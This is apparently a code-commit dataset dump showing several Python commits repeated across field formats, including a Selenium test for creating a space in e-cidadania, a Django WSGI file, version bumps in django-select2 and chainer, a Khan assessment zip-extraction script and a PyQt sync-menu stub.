username_field.send_keys(username)
password_field = self.browser.find_element_by_name('password')
password_field.send_keys(password)
self.wait(2)
password_field.send_keys(Keys.RETURN)
#self.wait(1)
self.wait(2)
url = self.live_server_url + self.getURL('create-space')
self.browser.get(url)
self.wait(2)
#Now we fill the creat space form
name_field = self.browser.find_element_by_name('name')
name_field.send_keys('test_space')
url_field = self.browser.find_element_by_name('url')
url_field.send_keys('test_url')
logo_field = self.browser.find_element_by_name('logo')
logo_field.send_keys(os.getcwd()+'/generic.jpeg')
banner_field = self.browser.find_element_by_name('banner')
banner_field.send_keys(os.getcwd()+'/generic.jpeg')
self.wait(2)
#url_field.send_keys(Keys.RETURN)
banner_field.submit()
self.wait(300)
|
Add functional tests for create a space.#/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2010-2012 Cidadania S. Coop. Galega
#
# This file is part of e-cidadania.
#
# e-cidadania is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# e-cidadania is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with e-cidadania. If not, see <http://www.gnu.org/licenses/>.
import os
from selenium.webdriver.common.keys import Keys
from tests.functional_utils import FunctionalTestCase
class CreateSpaceTest(FunctionalTestCase):
"""Tests if the page to create a space works correctly.
"""
def setUp(self):
self.init()
def testCreateSpace(self):
username = 'test_user'
password = 'test_password'
self.create_super_user(username, password)
url = self.live_server_url + self.getURL('site-index')
self.browser.get(url)
self.wait(2)
self.browser.find_element_by_link_text("Login").click()
self.wait(2)
username_field = self.browser.find_element_by_name('username')
username_field.send_keys(username)
password_field = self.browser.find_element_by_name('password')
password_field.send_keys(password)
self.wait(2)
password_field.send_keys(Keys.RETURN)
#self.wait(1)
self.wait(2)
url = self.live_server_url + self.getURL('create-space')
self.browser.get(url)
self.wait(2)
#Now we fill the creat space form
name_field = self.browser.find_element_by_name('name')
name_field.send_keys('test_space')
url_field = self.browser.find_element_by_name('url')
url_field.send_keys('test_url')
logo_field = self.browser.find_element_by_name('logo')
logo_field.send_keys(os.getcwd()+'/generic.jpeg')
banner_field = self.browser.find_element_by_name('banner')
banner_field.send_keys(os.getcwd()+'/generic.jpeg')
self.wait(2)
#url_field.send_keys(Keys.RETURN)
banner_field.submit()
self.wait(300)
|
<commit_before><commit_msg>Add functional tests for create a space.<commit_after>#/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2010-2012 Cidadania S. Coop. Galega
#
# This file is part of e-cidadania.
#
# e-cidadania is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# e-cidadania is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with e-cidadania. If not, see <http://www.gnu.org/licenses/>.
import os
from selenium.webdriver.common.keys import Keys
from tests.functional_utils import FunctionalTestCase
class CreateSpaceTest(FunctionalTestCase):
"""Tests if the page to create a space works correctly.
"""
def setUp(self):
self.init()
def testCreateSpace(self):
username = 'test_user'
password = 'test_password'
self.create_super_user(username, password)
url = self.live_server_url + self.getURL('site-index')
self.browser.get(url)
self.wait(2)
self.browser.find_element_by_link_text("Login").click()
self.wait(2)
username_field = self.browser.find_element_by_name('username')
username_field.send_keys(username)
password_field = self.browser.find_element_by_name('password')
password_field.send_keys(password)
self.wait(2)
password_field.send_keys(Keys.RETURN)
#self.wait(1)
self.wait(2)
url = self.live_server_url + self.getURL('create-space')
self.browser.get(url)
self.wait(2)
#Now we fill the creat space form
name_field = self.browser.find_element_by_name('name')
name_field.send_keys('test_space')
url_field = self.browser.find_element_by_name('url')
url_field.send_keys('test_url')
logo_field = self.browser.find_element_by_name('logo')
logo_field.send_keys(os.getcwd()+'/generic.jpeg')
banner_field = self.browser.find_element_by_name('banner')
banner_field.send_keys(os.getcwd()+'/generic.jpeg')
self.wait(2)
#url_field.send_keys(Keys.RETURN)
banner_field.submit()
self.wait(300)
|
|
4c875e312b35e19392c395da1bfe75bf61137b0b
|
marco/marco/wsgi_web468.py
|
marco/marco/wsgi_web468.py
|
"""WSGI File for Web468
"""
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "marco.settings")
activate_this = '/home/point97/env/marco_portal2/bin/activate_this.py'
execfile(activate_this, dict(__file__=activate_this))
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
|
Add wsgi file for 468
|
Add wsgi file for 468
|
Python
|
isc
|
MidAtlanticPortal/marco-portal2,MidAtlanticPortal/marco-portal2,MidAtlanticPortal/marco-portal2,Ecotrust/marineplanner-core,Ecotrust/marineplanner-core,Ecotrust/marineplanner-core,Ecotrust/marineplanner-core,MidAtlanticPortal/marco-portal2,Ecotrust/marineplanner-core
|
Add wsgi file for 468
|
"""WSGI File for Web468
"""
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "marco.settings")
activate_this = '/home/point97/env/marco_portal2/bin/activate_this.py'
execfile(activate_this, dict(__file__=activate_this))
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
|
<commit_before><commit_msg>Add wsgi file for 468<commit_after>
|
"""WSGI File for Web468
"""
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "marco.settings")
activate_this = '/home/point97/env/marco_portal2/bin/activate_this.py'
execfile(activate_this, dict(__file__=activate_this))
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
|
Add wsgi file for 468"""WSGI File for Web468
"""
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "marco.settings")
activate_this = '/home/point97/env/marco_portal2/bin/activate_this.py'
execfile(activate_this, dict(__file__=activate_this))
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
|
<commit_before><commit_msg>Add wsgi file for 468<commit_after>"""WSGI File for Web468
"""
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "marco.settings")
activate_this = '/home/point97/env/marco_portal2/bin/activate_this.py'
execfile(activate_this, dict(__file__=activate_this))
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
|
|
e184f5fea6425bc90ed1077fdd9cbacbaa12383e
|
django_select2/__init__.py
|
django_select2/__init__.py
|
# -*- coding: utf-8 -*-
"""
This is a Django_ integration of Select2_.
The app includes Select2 driven Django Widgets and Form Fields.
.. _Django: https://www.djangoproject.com/
.. _Select2: http://ivaynberg.github.com/select2/
"""
__version__ = "5.0.0"
|
# -*- coding: utf-8 -*-
"""
This is a Django_ integration of Select2_.
The app includes Select2 driven Django Widgets and Form Fields.
.. _Django: https://www.djangoproject.com/
.. _Select2: http://ivaynberg.github.com/select2/
"""
__version__ = "5.0.1"
|
Bump version number because v5.0.0 was taken on pypi due to mistake
|
Bump version number because v5.0.0 was taken on pypi due to mistake
|
Python
|
apache-2.0
|
DMOJ/django-select2,DMOJ/django-select2,anneFly/django-select2,anneFly/django-select2,applegrew/django-select2,rizumu/django-select2,anneFly/django-select2,applegrew/django-select2,rizumu/django-select2,rizumu/django-select2,applegrew/django-select2,DMOJ/django-select2
|
# -*- coding: utf-8 -*-
"""
This is a Django_ integration of Select2_.
The app includes Select2 driven Django Widgets and Form Fields.
.. _Django: https://www.djangoproject.com/
.. _Select2: http://ivaynberg.github.com/select2/
"""
__version__ = "5.0.0"
Bump version number because v5.0.0 was taken on pypi due to mistake
|
# -*- coding: utf-8 -*-
"""
This is a Django_ integration of Select2_.
The app includes Select2 driven Django Widgets and Form Fields.
.. _Django: https://www.djangoproject.com/
.. _Select2: http://ivaynberg.github.com/select2/
"""
__version__ = "5.0.1"
|
<commit_before># -*- coding: utf-8 -*-
"""
This is a Django_ integration of Select2_.
The app includes Select2 driven Django Widgets and Form Fields.
.. _Django: https://www.djangoproject.com/
.. _Select2: http://ivaynberg.github.com/select2/
"""
__version__ = "5.0.0"
<commit_msg>Bump version number because v5.0.0 was taken on pypi due to mistake<commit_after>
|
# -*- coding: utf-8 -*-
"""
This is a Django_ integration of Select2_.
The app includes Select2 driven Django Widgets and Form Fields.
.. _Django: https://www.djangoproject.com/
.. _Select2: http://ivaynberg.github.com/select2/
"""
__version__ = "5.0.1"
|
# -*- coding: utf-8 -*-
"""
This is a Django_ integration of Select2_.
The app includes Select2 driven Django Widgets and Form Fields.
.. _Django: https://www.djangoproject.com/
.. _Select2: http://ivaynberg.github.com/select2/
"""
__version__ = "5.0.0"
Bump version number because v5.0.0 was taken on pypi due to mistake# -*- coding: utf-8 -*-
"""
This is a Django_ integration of Select2_.
The app includes Select2 driven Django Widgets and Form Fields.
.. _Django: https://www.djangoproject.com/
.. _Select2: http://ivaynberg.github.com/select2/
"""
__version__ = "5.0.1"
|
<commit_before># -*- coding: utf-8 -*-
"""
This is a Django_ integration of Select2_.
The app includes Select2 driven Django Widgets and Form Fields.
.. _Django: https://www.djangoproject.com/
.. _Select2: http://ivaynberg.github.com/select2/
"""
__version__ = "5.0.0"
<commit_msg>Bump version number because v5.0.0 was taken on pypi due to mistake<commit_after># -*- coding: utf-8 -*-
"""
This is a Django_ integration of Select2_.
The app includes Select2 driven Django Widgets and Form Fields.
.. _Django: https://www.djangoproject.com/
.. _Select2: http://ivaynberg.github.com/select2/
"""
__version__ = "5.0.1"
|
06ba899aaaf5b8ff47c8ed6f317076c43d3351a0
|
chainer/__init__.py
|
chainer/__init__.py
|
from chainer import function
from chainer import function_set
from chainer.functions import basic_math
from chainer import optimizer
from chainer import variable
Variable = variable.Variable
Function = function.Function
FunctionSet = function_set.FunctionSet
Optimizer = optimizer.Optimizer
basic_math.install_variable_arithmetics()
|
import pkg_resources
from chainer import function
from chainer import function_set
from chainer.functions import basic_math
from chainer import optimizer
from chainer import variable
__version__ = pkg_resources.get_distribution('chainer').version
Variable = variable.Variable
Function = function.Function
FunctionSet = function_set.FunctionSet
Optimizer = optimizer.Optimizer
basic_math.install_variable_arithmetics()
|
Add version number to chainer module
|
Add version number to chainer module
|
Python
|
mit
|
t-abe/chainer,umitanuki/chainer,masia02/chainer,1986ks/chainer,benob/chainer,jnishi/chainer,ktnyt/chainer,AlpacaDB/chainer,sou81821/chainer,tscohen/chainer,okuta/chainer,Kaisuke5/chainer,keisuke-umezawa/chainer,pfnet/chainer,benob/chainer,hvy/chainer,kiyukuta/chainer,chainer/chainer,chainer/chainer,elviswf/chainer,kuwa32/chainer,keisuke-umezawa/chainer,jnishi/chainer,jnishi/chainer,ysekky/chainer,wkentaro/chainer,ktnyt/chainer,tereka114/chainer,muupan/chainer,minhpqn/chainer,t-abe/chainer,woodshop/chainer,hvy/chainer,bayerj/chainer,sinhrks/chainer,woodshop/complex-chainer,tigerneil/chainer,kikusu/chainer,cupy/cupy,AlpacaDB/chainer,okuta/chainer,wkentaro/chainer,chainer/chainer,ktnyt/chainer,niboshi/chainer,wkentaro/chainer,sinhrks/chainer,tkerola/chainer,ktnyt/chainer,keisuke-umezawa/chainer,cemoody/chainer,cupy/cupy,kikusu/chainer,okuta/chainer,chainer/chainer,aonotas/chainer,cupy/cupy,delta2323/chainer,muupan/chainer,ronekko/chainer,laysakura/chainer,wkentaro/chainer,yanweifu/chainer,ytoyama/yans_chainer_hackathon,anaruse/chainer,hidenori-t/chainer,hvy/chainer,okuta/chainer,rezoo/chainer,niboshi/chainer,niboshi/chainer,truongdq/chainer,jfsantos/chainer,wavelets/chainer,keisuke-umezawa/chainer,cupy/cupy,truongdq/chainer,kashif/chainer,jnishi/chainer,hvy/chainer,ikasumi/chainer,niboshi/chainer
|
from chainer import function
from chainer import function_set
from chainer.functions import basic_math
from chainer import optimizer
from chainer import variable
Variable = variable.Variable
Function = function.Function
FunctionSet = function_set.FunctionSet
Optimizer = optimizer.Optimizer
basic_math.install_variable_arithmetics()
Add version number to chainer module
|
import pkg_resources
from chainer import function
from chainer import function_set
from chainer.functions import basic_math
from chainer import optimizer
from chainer import variable
__version__ = pkg_resources.get_distribution('chainer').version
Variable = variable.Variable
Function = function.Function
FunctionSet = function_set.FunctionSet
Optimizer = optimizer.Optimizer
basic_math.install_variable_arithmetics()
|
<commit_before>from chainer import function
from chainer import function_set
from chainer.functions import basic_math
from chainer import optimizer
from chainer import variable
Variable = variable.Variable
Function = function.Function
FunctionSet = function_set.FunctionSet
Optimizer = optimizer.Optimizer
basic_math.install_variable_arithmetics()
<commit_msg>Add version number to chainer module<commit_after>
|
import pkg_resources
from chainer import function
from chainer import function_set
from chainer.functions import basic_math
from chainer import optimizer
from chainer import variable
__version__ = pkg_resources.get_distribution('chainer').version
Variable = variable.Variable
Function = function.Function
FunctionSet = function_set.FunctionSet
Optimizer = optimizer.Optimizer
basic_math.install_variable_arithmetics()
|
from chainer import function
from chainer import function_set
from chainer.functions import basic_math
from chainer import optimizer
from chainer import variable
Variable = variable.Variable
Function = function.Function
FunctionSet = function_set.FunctionSet
Optimizer = optimizer.Optimizer
basic_math.install_variable_arithmetics()
Add version number to chainer moduleimport pkg_resources
from chainer import function
from chainer import function_set
from chainer.functions import basic_math
from chainer import optimizer
from chainer import variable
__version__ = pkg_resources.get_distribution('chainer').version
Variable = variable.Variable
Function = function.Function
FunctionSet = function_set.FunctionSet
Optimizer = optimizer.Optimizer
basic_math.install_variable_arithmetics()
|
<commit_before>from chainer import function
from chainer import function_set
from chainer.functions import basic_math
from chainer import optimizer
from chainer import variable
Variable = variable.Variable
Function = function.Function
FunctionSet = function_set.FunctionSet
Optimizer = optimizer.Optimizer
basic_math.install_variable_arithmetics()
<commit_msg>Add version number to chainer module<commit_after>import pkg_resources
from chainer import function
from chainer import function_set
from chainer.functions import basic_math
from chainer import optimizer
from chainer import variable
__version__ = pkg_resources.get_distribution('chainer').version
Variable = variable.Variable
Function = function.Function
FunctionSet = function_set.FunctionSet
Optimizer = optimizer.Optimizer
basic_math.install_variable_arithmetics()
|
d7beafc221bbd54038654a87c680577b251d93de
|
extract_khan_assessment.py
|
extract_khan_assessment.py
|
"""
extract_khan_assessment
Creates a khan_assessment.zip, fully compatible with KA Lite 0.15.x and below,
from a full content pack.
Usage:
extract_khan_assessment.py <content-pack-path> [<out-path>]
"""
import logging
import zipfile
from docopt import docopt
from pathlib import Path
ASSESSMENT_FOLDER_IN_ZIP = "khan/" # Note: this should just be imported from the contentpacks module
def extract_khan_assessment(contentpackpath: Path, outpath: Path):
with zipfile.ZipFile(str(contentpackpath)) as cf,\
zipfile.ZipFile(str(outpath), "w") as of:
items = list(i for i in cf.namelist()
if ASSESSMENT_FOLDER_IN_ZIP in i)
logging.info("Writing {} items to {}".format(
len(items),
outpath)
)
for item in items:
bytes = cf.read(item)
# the relative_to call removes the leading khan/ in the item's path
new_item_name = Path(item).relative_to(ASSESSMENT_FOLDER_IN_ZIP)
of.writestr(str(new_item_name), bytes)
logging.info("great success.")
def main():
args = docopt(__doc__)
logging.basicConfig()
contentpackpath = Path(args["<content-pack-path>"])
outpath = Path(args["<out-path>"] or "out/khan_assessment.zip")
outpath = outpath.expanduser()
extract_khan_assessment(contentpackpath, outpath)
if __name__ == "__main__":
main()
|
Create a script to extract khan assessment resources.
|
Create a script to extract khan assessment resources.
And place them into their own zip file. New zip file is compatible with
khan_assessment.zip from KA Lite releases 0.15.x and below.
|
Python
|
bsd-2-clause
|
fle-internal/content-pack-maker
|
Create a script to extract khan assessment resources.
And place them into their own zip file. New zip file is compatible with
khan_assessment.zip from KA Lite releases 0.15.x and below.
|
"""
extract_khan_assessment
Creates a khan_assessment.zip, fully compatible with KA Lite 0.15.x and below,
from a full content pack.
Usage:
extract_khan_assessment.py <content-pack-path> [<out-path>]
"""
import logging
import zipfile
from docopt import docopt
from pathlib import Path
ASSESSMENT_FOLDER_IN_ZIP = "khan/" # Note: this should just be imported from the contentpacks module
def extract_khan_assessment(contentpackpath: Path, outpath: Path):
with zipfile.ZipFile(str(contentpackpath)) as cf,\
zipfile.ZipFile(str(outpath), "w") as of:
items = list(i for i in cf.namelist()
if ASSESSMENT_FOLDER_IN_ZIP in i)
logging.info("Writing {} items to {}".format(
len(items),
outpath)
)
for item in items:
bytes = cf.read(item)
# the relative_to call removes the leading khan/ in the item's path
new_item_name = Path(item).relative_to(ASSESSMENT_FOLDER_IN_ZIP)
of.writestr(str(new_item_name), bytes)
logging.info("great success.")
def main():
args = docopt(__doc__)
logging.basicConfig()
contentpackpath = Path(args["<content-pack-path>"])
outpath = Path(args["<out-path>"] or "out/khan_assessment.zip")
outpath = outpath.expanduser()
extract_khan_assessment(contentpackpath, outpath)
if __name__ == "__main__":
main()
|
<commit_before><commit_msg>Create a script to extract khan assessment resources.
And place them into their own zip file. New zip file is compatible with
khan_assessment.zip from KA Lite releases 0.15.x and below.<commit_after>
|
"""
extract_khan_assessment
Creates a khan_assessment.zip, fully compatible with KA Lite 0.15.x and below,
from a full content pack.
Usage:
extract_khan_assessment.py <content-pack-path> [<out-path>]
"""
import logging
import zipfile
from docopt import docopt
from pathlib import Path
ASSESSMENT_FOLDER_IN_ZIP = "khan/" # Note: this should just be imported from the contentpacks module
def extract_khan_assessment(contentpackpath: Path, outpath: Path):
with zipfile.ZipFile(str(contentpackpath)) as cf,\
zipfile.ZipFile(str(outpath), "w") as of:
items = list(i for i in cf.namelist()
if ASSESSMENT_FOLDER_IN_ZIP in i)
logging.info("Writing {} items to {}".format(
len(items),
outpath)
)
for item in items:
bytes = cf.read(item)
# the relative_to call removes the leading khan/ in the item's path
new_item_name = Path(item).relative_to(ASSESSMENT_FOLDER_IN_ZIP)
of.writestr(str(new_item_name), bytes)
logging.info("great success.")
def main():
args = docopt(__doc__)
logging.basicConfig()
contentpackpath = Path(args["<content-pack-path>"])
outpath = Path(args["<out-path>"] or "out/khan_assessment.zip")
outpath = outpath.expanduser()
extract_khan_assessment(contentpackpath, outpath)
if __name__ == "__main__":
main()
|
Create a script to extract khan assessment resources.
And place them into their own zip file. New zip file is compatible with
khan_assessment.zip from KA Lite releases 0.15.x and below."""
extract_khan_assessment
Creates a khan_assessment.zip, fully compatible with KA Lite 0.15.x and below,
from a full content pack.
Usage:
extract_khan_assessment.py <content-pack-path> [<out-path>]
"""
import logging
import zipfile
from docopt import docopt
from pathlib import Path
ASSESSMENT_FOLDER_IN_ZIP = "khan/" # Note: this should just be imported from the contentpacks module
def extract_khan_assessment(contentpackpath: Path, outpath: Path):
with zipfile.ZipFile(str(contentpackpath)) as cf,\
zipfile.ZipFile(str(outpath), "w") as of:
items = list(i for i in cf.namelist()
if ASSESSMENT_FOLDER_IN_ZIP in i)
logging.info("Writing {} items to {}".format(
len(items),
outpath)
)
for item in items:
bytes = cf.read(item)
# the relative_to call removes the leading khan/ in the item's path
new_item_name = Path(item).relative_to(ASSESSMENT_FOLDER_IN_ZIP)
of.writestr(str(new_item_name), bytes)
logging.info("great success.")
def main():
args = docopt(__doc__)
logging.basicConfig()
contentpackpath = Path(args["<content-pack-path>"])
outpath = Path(args["<out-path>"] or "out/khan_assessment.zip")
outpath = outpath.expanduser()
extract_khan_assessment(contentpackpath, outpath)
if __name__ == "__main__":
main()
|
<commit_before><commit_msg>Create a script to extract khan assessment resources.
And place them into their own zip file. New zip file is compatible with
khan_assessment.zip from KA Lite releases 0.15.x and below.<commit_after>"""
extract_khan_assessment
Creates a khan_assessment.zip, fully compatible with KA Lite 0.15.x and below,
from a full content pack.
Usage:
extract_khan_assessment.py <content-pack-path> [<out-path>]
"""
import logging
import zipfile
from docopt import docopt
from pathlib import Path
ASSESSMENT_FOLDER_IN_ZIP = "khan/" # Note: this should just be imported from the contentpacks module
def extract_khan_assessment(contentpackpath: Path, outpath: Path):
with zipfile.ZipFile(str(contentpackpath)) as cf,\
zipfile.ZipFile(str(outpath), "w") as of:
items = list(i for i in cf.namelist()
if ASSESSMENT_FOLDER_IN_ZIP in i)
logging.info("Writing {} items to {}".format(
len(items),
outpath)
)
for item in items:
bytes = cf.read(item)
# the relative_to call removes the leading khan/ in the item's path
new_item_name = Path(item).relative_to(ASSESSMENT_FOLDER_IN_ZIP)
of.writestr(str(new_item_name), bytes)
logging.info("great success.")
def main():
args = docopt(__doc__)
logging.basicConfig()
contentpackpath = Path(args["<content-pack-path>"])
outpath = Path(args["<out-path>"] or "out/khan_assessment.zip")
outpath = outpath.expanduser()
extract_khan_assessment(contentpackpath, outpath)
if __name__ == "__main__":
main()
|
|
f755060a8999a1d6ba007f24dda9d00b9bb9d5dd
|
UI/sunc_menu.py
|
UI/sunc_menu.py
|
# -*- coding: utf-8 -*-
from PyQt4 import QtCore, QtGui
from qt_interfaces.sync_menu_ui import Ui_SyncMenu
# Synchronization menu section #
class SyncMenuUI(QtGui.QMainWindow):
def __init__(self, parent=None,):
QtGui.QWidget.__init__(self, parent)
self.sync_menu_ui = Ui_SyncMenu()
self.sync_menu_ui.setupUi(self)
# start synchronization action
QtCore.QObject.connect(
self.sync_menu_ui.start_sync_bt,
QtCore.SIGNAL('clicked()'),
self.start_sync_action)
def start_sync_action(self):
return 1
def stop_sync_action(self):
return 1
def update_current_main_sync_stats(self, stats_array):
self.sync_menu_ui.successfully_synced_files_count.setText(stats_array["successfully_synced_files_count"])
return 1
|
Add sync menu backend init
|
Add sync menu backend init
|
Python
|
mit
|
lakewik/storj-gui-client
|
Add sync menu backend init
|
# -*- coding: utf-8 -*-
from PyQt4 import QtCore, QtGui
from qt_interfaces.sync_menu_ui import Ui_SyncMenu
# Synchronization menu section #
class SyncMenuUI(QtGui.QMainWindow):
def __init__(self, parent=None,):
QtGui.QWidget.__init__(self, parent)
self.sync_menu_ui = Ui_SyncMenu()
self.sync_menu_ui.setupUi(self)
# start synchronization action
QtCore.QObject.connect(
self.sync_menu_ui.start_sync_bt,
QtCore.SIGNAL('clicked()'),
self.start_sync_action)
def start_sync_action(self):
return 1
def stop_sync_action(self):
return 1
def update_current_main_sync_stats(self, stats_array):
self.sync_menu_ui.successfully_synced_files_count.setText(stats_array["successfully_synced_files_count"])
return 1
|
<commit_before><commit_msg>Add sync menu backend init<commit_after>
|
# -*- coding: utf-8 -*-
from PyQt4 import QtCore, QtGui
from qt_interfaces.sync_menu_ui import Ui_SyncMenu
# Synchronization menu section #
class SyncMenuUI(QtGui.QMainWindow):
def __init__(self, parent=None,):
QtGui.QWidget.__init__(self, parent)
self.sync_menu_ui = Ui_SyncMenu()
self.sync_menu_ui.setupUi(self)
# start synchronization action
QtCore.QObject.connect(
self.sync_menu_ui.start_sync_bt,
QtCore.SIGNAL('clicked()'),
self.start_sync_action)
def start_sync_action(self):
return 1
def stop_sync_action(self):
return 1
def update_current_main_sync_stats(self, stats_array):
self.sync_menu_ui.successfully_synced_files_count.setText(stats_array["successfully_synced_files_count"])
return 1
|
Add sync menu backend init# -*- coding: utf-8 -*-
from PyQt4 import QtCore, QtGui
from qt_interfaces.sync_menu_ui import Ui_SyncMenu
# Synchronization menu section #
class SyncMenuUI(QtGui.QMainWindow):
def __init__(self, parent=None,):
QtGui.QWidget.__init__(self, parent)
self.sync_menu_ui = Ui_SyncMenu()
self.sync_menu_ui.setupUi(self)
# start synchronization action
QtCore.QObject.connect(
self.sync_menu_ui.start_sync_bt,
QtCore.SIGNAL('clicked()'),
self.start_sync_action)
def start_sync_action(self):
return 1
def stop_sync_action(self):
return 1
def update_current_main_sync_stats(self, stats_array):
self.sync_menu_ui.successfully_synced_files_count.setText(stats_array["successfully_synced_files_count"])
return 1
|
<commit_before><commit_msg>Add sync menu backend init<commit_after># -*- coding: utf-8 -*-
from PyQt4 import QtCore, QtGui
from qt_interfaces.sync_menu_ui import Ui_SyncMenu
# Synchronization menu section #
class SyncMenuUI(QtGui.QMainWindow):
def __init__(self, parent=None,):
QtGui.QWidget.__init__(self, parent)
self.sync_menu_ui = Ui_SyncMenu()
self.sync_menu_ui.setupUi(self)
# start synchronization action
QtCore.QObject.connect(
self.sync_menu_ui.start_sync_bt,
QtCore.SIGNAL('clicked()'),
self.start_sync_action)
def start_sync_action(self):
return 1
def stop_sync_action(self):
return 1
def update_current_main_sync_stats(self, stats_array):
self.sync_menu_ui.successfully_synced_files_count.setText(stats_array["successfully_synced_files_count"])
return 1
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.